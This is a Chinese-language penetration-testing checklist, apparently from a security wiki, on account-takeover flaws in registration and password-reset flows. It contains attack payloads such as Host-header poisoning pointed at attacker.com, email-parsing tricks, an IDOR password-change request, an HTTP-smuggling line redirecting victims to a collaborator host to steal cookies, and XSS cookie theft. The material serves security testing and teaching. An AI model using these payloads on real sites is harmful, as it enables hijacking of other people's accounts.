Registration & Takeover Vulnerabilities
WhiteIntel 是一个由暗网支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到窃取恶意软件的侵害。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
注册接管
重复注册
尝试使用现有用户名生成
检查变化的电子邮件:
大写
+1@
在电子邮件中添加一些点
电子邮件名称中的特殊字符(%00,%09,%20)
在电子邮件后面放置黑色字符:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
用户名枚举
检查是否可以确定应用程序中是否已经注册了用户名。
密码策略
创建用户时检查密码策略(检查是否可以使用弱密码)。 在这种情况下,您可以尝试暴力破解凭据。
SQL 注入
查看此页面了解如何尝试通过注册表单中的SQL 注入进行账户接管或提取信息。
Oauth 接管
pageOAuth to Account takeoverSAML 漏洞
pageSAML Attacks更多检查
检查是否可以使用一次性电子邮件
长 密码(>200)会导致拒绝服务
检查账户创建的速率限制
使用 username@burp_collab.net 并分析回调
密码重置接管
通过引用者泄漏密码重置令牌
请求将密码重置到您的电子邮件地址
单击密码重置链接
不要更改密码
单击任何第三方网站(例如:Facebook,Twitter)
拦截 Burp Suite 代理中的请求
检查 referer 标头是否泄漏密码重置令牌。
密码重置操纵
在 Burp Suite 中拦截密码重置请求
在 Burp Suite 中添加或编辑以下标头:
Host: attacker.com
,X-Forwarded-Host: attacker.com
使用修改后的标头转发请求
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
查找基于 _host 标头_的密码重置 URL,例如:
https://attacker.com/reset-password.php?token=TOKEN
通过电子邮件参数进行密码重置
API参数上的IDOR
攻击者必须使用他们的帐户登录并转到更改密码功能。
启动Burp Suite并拦截请求。
将其发送到重复器选项卡并编辑参数:用户ID/电子邮件
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
弱密码重置令牌
密码重置令牌应该是随机生成的,并且每次都是唯一的。 尝试确定令牌是否过期或是否始终相同,在某些情况下,生成算法较弱,可以被猜测。以下变量可能被算法使用。
时间戳
用户ID
用户电子邮件
名字和姓氏
出生日期
密码学
仅数字
小令牌序列(字符在[A-Z,a-z,0-9]之间)
令牌重用
令牌过期日期
泄露密码重置令牌
使用API/UI触发特定电子邮件的密码重置请求,例如:test@mail.com
检查服务器响应并查找
resetToken
然后在URL中使用令牌,如
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
通过用户名冲突进行密码重置
使用与受害者用户名相同的用户名在系统上注册,但在用户名之前和/或之后插入空格。例如:
"admin "
使用您的恶意用户名请求重置密码。
使用发送到您的电子邮件的令牌重置受害者密码。
使用新密码连接到受害者帐户。
平台CTFd容易受到此攻击的影响。 参见:CVE-2020-7245
通过跨站脚本攻击实施账户接管
在应用程序内部或子域中找到XSS漏洞,如果cookie的范围限定在父域:
*.domain.com
泄露当前的会话cookie
使用cookie对用户进行身份验证
通过HTTP请求走私实施账户接管
使用smuggler检测HTTP请求走私的类型(CL、TE、CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
\构造一个请求,该请求将使用以下数据覆盖
POST / HTTP/1.1
:GET http://something.burpcollaborator.net HTTP/1.1 X:
,目的是将受害者重定向到burpcollab并窃取其cookie\最终请求可能如下所示
Hackerone 报告利用此漏洞\
通过 CSRF 进行账户接管
创建 CSRF 的 payload,例如:“自动提交密码更改的 HTML 表单”
发送 payload
通过 JWT 进行账户接管
JSON Web Token 可能用于验证用户身份。
编辑 JWT,使用另一个用户 ID / 电子邮件
检查弱 JWT 签名
参考资料
WhiteIntel 是一个由暗网支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到窃取恶意软件的威胁。
WhiteIntel 的主要目标是打击由窃取信息恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
最后更新于